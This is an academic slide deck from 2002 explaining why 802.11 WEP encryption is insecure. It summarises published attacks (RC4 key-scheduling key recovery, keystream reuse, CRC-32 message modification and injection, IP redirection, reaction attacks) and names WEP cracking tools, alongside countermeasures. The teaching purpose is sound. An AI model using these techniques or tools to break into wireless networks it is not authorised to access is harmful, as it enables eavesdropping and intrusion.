The Insecurity of 802.11

1
The Insecurity of 802.11

• Chun Zhang
• Mar 6, 2002

2
Outline

• the 802.11 standard
• security goals/mechanisms in 802.11 standard
• the core failure Wired Equivalent Privacy
• reason 1 weakness of RC4
• reason 2 Intercepting
• non-standard security method
• Your 802.11 No Clothes

3
Outline

• the 802.11 standard
• security goals/mechanisms in 802.11 standard
• the core failure Wired Equivalent Privacy
• reason 1 weakness of RC4
• reason 2 Intercepting
• non-standard security method
• Your 802.11 No Clothes

4
The 802.11 Standard

• specifies LAN networking functions over air
• 802.11 is composed of
• Medium Access Control
• PHysical Layer

5
Two Kinds of 802.11 Networks
infrastructure network
ad-hoc network
Access Point(AP)
Mobilestation
6
Outline

• the 802.11 standard
• security goals/mechanisms in 802.11 standard
• the core failure Wired Equivalent Privacy
• reason 1 Intercepting
• reason 2 weakness of RC4
• non-standard security method
• Your 802.11 No Clothes

7
The Parking Lot Attack
attacker
internet
firewall
8
802.11 Security Goals

• primary goals confidentiality
• other goals
• access control
• integrity

9
802.11 Security Mechanisms

• open system based security
• authenticates anyone
• plaintext transmission
• shared key based security (using WEP)
• authentication, encryption/decryption

10

• Wired Equivalent Privacy
• --- protecting authorized users of a wireless
  LAN from casual eavesdropping

11
Properties of WEP protocol

• reasonably strong
• measured by brute-force attack
• self-synchronizing
• link level encryption/decryption protocol
• efficient
• exportable
• implementation optional

12
WEP Protocol (encryption)

• m message cm integrity checksum
• k shared key
• iv initialization vector (randomly chosen)

ciphertext transmitted through the radio link
13
WEP Protocol (decryption)

• m message cm integrity checksum
• k shared key (distribution is not mentioned)
• iv initialization vector (randomly chosen)

ciphertext received through the radio link
14
Authentication using WEP
15
Outline

• the 802.11 standard
• security goals/mechanisms in 802.11 standard
• the core failure Wired Equivalent Privacy
• reason 1 weakness of RC4
• reason 2 Intercepting
• non-standard security method
• Your 802.11 No Clothes

16
Attacking WEP Keys

• Weaknesses in the Key Scheduling Algorithm of RC4
• A Paper by Scott Fluhrer, Itsik Mantin, and
  Adi Shamir
• SAC 2001
• Using the Fluhrer, Mantin, and Shamir Attack to
  Break Wep
• A Paper by Adam Stubblefield, John Ioannidis,
  Aviel D.Rubin
• ATT lab Technical Report 2001

17
Attacking WEP Keys (Cont.)

• philosophy
• in RC4 algorithms, a large number of weak
• KEYS(WEP key plus IV) , in which knowledge of a
• small number of key bits suffices to
  determine many
• states and output bits with non-negligible
  probability.

18
Attacking WEP Keys (Cont.)

• mounting the hack
• search for IV that leaks information about the
  WEP key
• a packet just leaks a little info on the WEP key
• millions packets to recover a 128-bit key

19
Outline

• the 802.11 standard
• security goals/mechanisms in 802.11 standard
• the core failure Wired Equivalent Privacy
• reason 1 weakness of RC4
• reason 2 Intercepting
• non-standard security method
• Your 802.11 No Clothes

20
Attacking the holes of WEP

• Intercepting Mobile Communications The
  Insecurity of 802.11
• A Paper by Nikita Borisov, UC Berkeley
• Ian Goldberg, Zero-Knowledge Systems
• David Wagner, UC Berkeley
• Appeared in Proceedings of MOBICOM 2001

21
Attack based on Keystream Reuse

• two ciphers obtained by using same values of (iv,
  k) reveals information about their Plaintexts
• Let, C1 P1 XOR RC4(iv,k)
• C2 P2 XOR RC4(iv,k)
• gt C1 XOR C2 P1 XOR P2
• we can get the value of P1 if we know P2 and
  vice-versa

22
Attack based on Keystream Reuse (Cont.)

• assuming fixed k , known plaintext, we could
  build Decryption Dictionaries
• C RC4(iv, k) XOR ltM, c(M)gt
• P ltM, c(M)gt
• C XOR P RC4(iv, k)
• number of entries is 224, each entry occupying
  about 1500 bytes, which roughly calculates to 24
  GB
• building this table ensures decryption, even if
  length of k is increased
• most access point reset iv to 0 when power off ,
  and increase by 1

23
Attacks based on the Properties of Checksum

• property 1 ( property of WEP CRC-32 checksum )
• c(x XOR y) c(x) XOR c(y)
• message modification
• C RC4(iv, k) XOR ltM, c(M)gt
• to modify P(ltM, c(M)gt) into P XOR ?,
• C C XOR lt?, c(?)gt

24
Attacks based on the Properties of Checksum
(Cont.)

• property 2 ( property of WEP CRC-32 checksum )
• it is an un-keyed function of the message
• property 3 ( property of WEP access point )
• it is possible to reuse old IV values without
  triggering any alarms at the receiver

25
Attacks based on the Properties of Checksum
(Cont.)

• message injection
• given random M, generating c(M) using property 2
• C RC4(iv, k) XOR ltM, c(M)gt
• send out using property 3
• a special case authentication spoofing

26
Message Decryption

• IP redirection
• access point acting as IP router with Internet
  connectivity
• change the destination address to hackers site
• access point will decrypt the msg for us !
• reaction attack
• used when no hackers site available
• change ciphertext based on some knowledge
• info leaking through receivers reaction

27
IP Redirection

• changing of IP address
• assuming easy to get original source/destination
  address
• message modification
• changing of IP checksum
• old checksum X
• new checksum X X DH DL DH - DL (,-
  are 1s complement)
• could be calculated after a small number of
  attempts
• DH, DL high/low 16-bit words of IP address

28
IP Redirection (Continued)

• changing other field while maintaining the IP
  checksum
• modify source IP address
• Subtract DHDL-DH-DL from the low 16-bit word
• might be dropped due to egree filter
• select destination address if hacker has the
  ability to monitor an entire class B network
• DL DH DL - DH

29
Reaction Attacks

• attack against TCP traffic
• fact ACK would be sent only if TCP checksum is
  correct
• for any i, flipping ith bit and (i16)th bit will
  not change TCP checksum only if ith bit XOR
  (i16)th bit 1
• repeating the procedure on the same message for
  all the bits, will reveal the plaintext of that
  message

30
Outline

• the 802.11 standard
• security goals/mechanisms in 802.11 standard
• the core failure Wired Equivalent Privacy
• reason 1 weakness of RC4
• reason 2 Intercepting
• non-standard security method
• Your 802.11 No Clothes

31
Closed Network Access Control

• SSID service set identifier
• only person who know SSID can be served
• unfortunately, SSID is broadcasted in the clear

32
Access Control List

• Ethernet MAC Address Access Control Lists
• only wireless card with listed MAC address can be
  served
• unfortunately, MAC addresses are also sent clear
  in the air
• wireless card MAC address clone

33
Hacking Tools

• to crack the key
• http//airsnort.sourceforge.net/
• http//sourceforge.net/projects/wepcrack/
• wireless sniffers
• http//www.personaltelco.net/index.cgi/WirelessSni
  ffers

34
Countermeasures

• treat it as not exist
• put access point outside the firewall
• higher level Virtual Private Network, SSL, SSH,
  IPSec
• existing protocol Kerboros AES
• improvement
• key management
• iv, k length increase (WEP2)
• keyed checksum

35
Thanks !